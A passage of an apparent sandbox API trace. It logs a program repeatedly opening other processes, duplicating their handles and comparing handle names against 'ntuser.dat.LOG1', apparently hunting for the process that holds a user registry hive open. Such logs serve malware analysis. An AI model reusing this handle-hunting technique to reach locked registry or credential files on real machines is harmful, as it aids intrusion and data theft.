lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.924] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.925] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.925] CloseHandle (hObject=0x1e4) returned 1 [0160.925] CloseHandle (hObject=0x194) returned 1 [0160.925] CloseHandle (hObject=0x1e8) returned 1 [0160.925] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0160.925] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.925] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.926] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.927] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.927] CloseHandle (hObject=0x1e4) returned 1 [0160.927] CloseHandle (hObject=0x194) returned 1 [0160.927] CloseHandle (hObject=0x1e8) returned 1 [0160.927] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0160.927] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.927] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.928] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.928] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.928] CloseHandle (hObject=0x1e4) returned 1 [0160.928] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\ntuser.dat.LOG1") returned -2 [0160.928] CloseHandle (hObject=0x194) returned 1 [0160.929] CloseHandle (hObject=0x1e8) returned 1 [0160.929] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0160.929] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.929] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.929] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.930] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.930] CloseHandle (hObject=0x1e4) returned 1 [0160.930] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\ntuser.dat.LOG1") returned -2 [0160.930] CloseHandle (hObject=0x194) returned 1 [0160.930] CloseHandle (hObject=0x1e8) returned 1 [0160.930] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0160.930] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.930] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.931] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.932] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.932] CloseHandle (hObject=0x1e4) returned 1 [0160.932] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\ntuser.dat.LOG1") returned -2 [0160.932] CloseHandle (hObject=0x194) returned 1 [0160.932] CloseHandle (hObject=0x1e8) returned 1 [0160.932] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0160.932] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.932] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.933] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.933] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.934] CloseHandle (hObject=0x1e4) returned 1 [0160.934] _wcsicmp (_Str1="\\lsm.exe.mui", _Str2="\\ntuser.dat.LOG1") returned -2 [0160.934] CloseHandle (hObject=0x194) returned 1 [0160.934] CloseHandle (hObject=0x1e8) returned 1 [0160.934] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0160.934] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.934] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.935] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.935] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.936] CloseHandle (hObject=0x1e4) returned 1 [0160.936] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0160.936] CloseHandle (hObject=0x194) returned 1 [0160.936] CloseHandle (hObject=0x1e8) returned 1 [0160.936] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0160.936] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.936] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.937] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.938] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.938] CloseHandle (hObject=0x1e4) returned 1 [0160.938] CloseHandle (hObject=0x194) returned 1 [0160.938] CloseHandle (hObject=0x1e8) returned 1 [0160.938] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0160.938] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x280, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.938] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.939] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.940] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.940] CloseHandle (hObject=0x1e4) returned 1 [0160.940] _wcsicmp (_Str1="\\plugplay", _Str2="\\ntuser.dat.LOG1") returned 2 [0160.940] CloseHandle (hObject=0x194) returned 1 [0160.940] CloseHandle (hObject=0x1e8) returned 1 [0160.940] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0160.940] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x284, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.940] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.941] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.941] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.942] CloseHandle (hObject=0x1e4) returned 1 [0160.942] _wcsicmp (_Str1="\\plugplay", _Str2="\\ntuser.dat.LOG1") returned 2 [0160.942] CloseHandle (hObject=0x194) returned 1 [0160.942] CloseHandle (hObject=0x1e8) returned 1 [0160.942] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0160.942] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x288, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.942] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.943] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.943] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.943] CloseHandle (hObject=0x1e4) returned 1 [0160.944] _wcsicmp (_Str1="\\plugplay", _Str2="\\ntuser.dat.LOG1") returned 2 [0160.944] CloseHandle (hObject=0x194) returned 1 [0160.944] CloseHandle (hObject=0x1e8) returned 1 [0160.944] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0160.944] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x370, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.944] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.947] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.950] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.950] CloseHandle (hObject=0x1e4) returned 1 [0160.950] CloseHandle (hObject=0x194) returned 1 [0160.950] CloseHandle (hObject=0x1e8) returned 1 [0160.950] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0160.950] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.950] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.951] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.951] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.951] CloseHandle (hObject=0x1e4) returned 1 [0160.951] _wcsicmp (_Str1="\\umpnpmgr.dll.mui", _Str2="\\ntuser.dat.LOG1") returned 7 [0160.951] CloseHandle (hObject=0x194) returned 1 [0160.952] CloseHandle (hObject=0x1e8) returned 1 [0160.952] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0160.952] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.952] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.953] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.953] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.954] CloseHandle (hObject=0x1e4) returned 1 [0160.954] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0160.954] CloseHandle (hObject=0x194) returned 1 [0160.954] CloseHandle (hObject=0x1e8) returned 1 [0160.954] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0160.954] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x84, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.955] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.955] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.955] CloseHandle (hObject=0x1e4) returned 1 [0160.955] CloseHandle (hObject=0x194) returned 1 [0160.955] CloseHandle (hObject=0x1e8) returned 1 [0160.955] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0160.955] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.956] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.961] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.962] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.962] CloseHandle (hObject=0x1e4) returned 1 [0160.962] CloseHandle (hObject=0x194) returned 1 [0160.962] CloseHandle (hObject=0x1e8) returned 1 [0160.962] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0160.962] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x164, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.962] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.963] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.964] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.964] CloseHandle (hObject=0x1e4) returned 1 [0160.964] CloseHandle (hObject=0x194) returned 1 [0160.964] CloseHandle (hObject=0x1e8) returned 1 [0160.964] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0160.964] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x168, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.964] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.965] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.966] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.966] CloseHandle (hObject=0x1e4) returned 1 [0160.966] CloseHandle (hObject=0x194) returned 1 [0160.966] CloseHandle (hObject=0x1e8) returned 1 [0160.966] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0160.966] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x170, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.966] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.967] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.968] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.968] CloseHandle (hObject=0x1e4) returned 1 [0160.968] _wcsicmp (_Str1="\\CatalogChangeListener-294-0", _Str2="\\ntuser.dat.LOG1") returned -11 [0160.968] CloseHandle (hObject=0x194) returned 1 [0160.968] CloseHandle (hObject=0x1e8) returned 1 [0160.968] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0160.968] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x174, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.968] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.969] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.969] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.970] CloseHandle (hObject=0x1e4) returned 1 [0160.970] CloseHandle (hObject=0x194) returned 1 [0160.970] CloseHandle (hObject=0x1e8) returned 1 [0160.970] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0160.970] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x17c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.970] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.973] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.976] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.976] CloseHandle (hObject=0x1e4) returned 1 [0160.976] CloseHandle (hObject=0x194) returned 1 [0160.976] CloseHandle (hObject=0x1e8) returned 1 [0160.976] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0160.976] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.976] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.977] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.978] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.978] CloseHandle (hObject=0x1e4) returned 1 [0160.978] CloseHandle (hObject=0x194) returned 1 [0160.978] CloseHandle (hObject=0x1e8) returned 1 [0160.978] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0160.978] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x184, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.978] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.983] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.984] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.984] CloseHandle (hObject=0x1e4) returned 1 [0160.984] CloseHandle (hObject=0x194) returned 1 [0160.984] CloseHandle (hObject=0x1e8) returned 1 [0160.984] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0160.984] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.984] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.986] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.989] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.989] CloseHandle (hObject=0x1e4) returned 1 [0160.990] CloseHandle (hObject=0x194) returned 1 [0160.990] CloseHandle (hObject=0x1e8) returned 1 [0160.990] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0160.990] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.990] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.990] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.994] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.994] CloseHandle (hObject=0x1e4) returned 1 [0160.994] CloseHandle (hObject=0x194) returned 1 [0160.994] CloseHandle (hObject=0x1e8) returned 1 [0160.994] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0160.994] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.994] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.995] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.995] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.996] CloseHandle (hObject=0x1e4) returned 1 [0160.996] _wcsicmp (_Str1="\\epmapper", _Str2="\\ntuser.dat.LOG1") returned -9 [0160.996] CloseHandle (hObject=0x194) returned 1 [0160.996] CloseHandle (hObject=0x1e8) returned 1 [0160.996] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0160.996] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.996] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.997] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.997] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.998] CloseHandle (hObject=0x1e4) returned 1 [0160.998] _wcsicmp (_Str1="\\epmapper", _Str2="\\ntuser.dat.LOG1") returned -9 [0160.998] CloseHandle (hObject=0x194) returned 1 [0160.998] CloseHandle (hObject=0x1e8) returned 1 [0160.998] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0160.998] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.998] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.998] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.999] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.999] CloseHandle (hObject=0x1e4) returned 1 [0160.999] _wcsicmp (_Str1="\\epmapper", _Str2="\\ntuser.dat.LOG1") returned -9 [0160.999] CloseHandle (hObject=0x194) returned 1 [0160.999] CloseHandle (hObject=0x1e8) returned 1 [0160.999] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.000] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.000] CreateThread 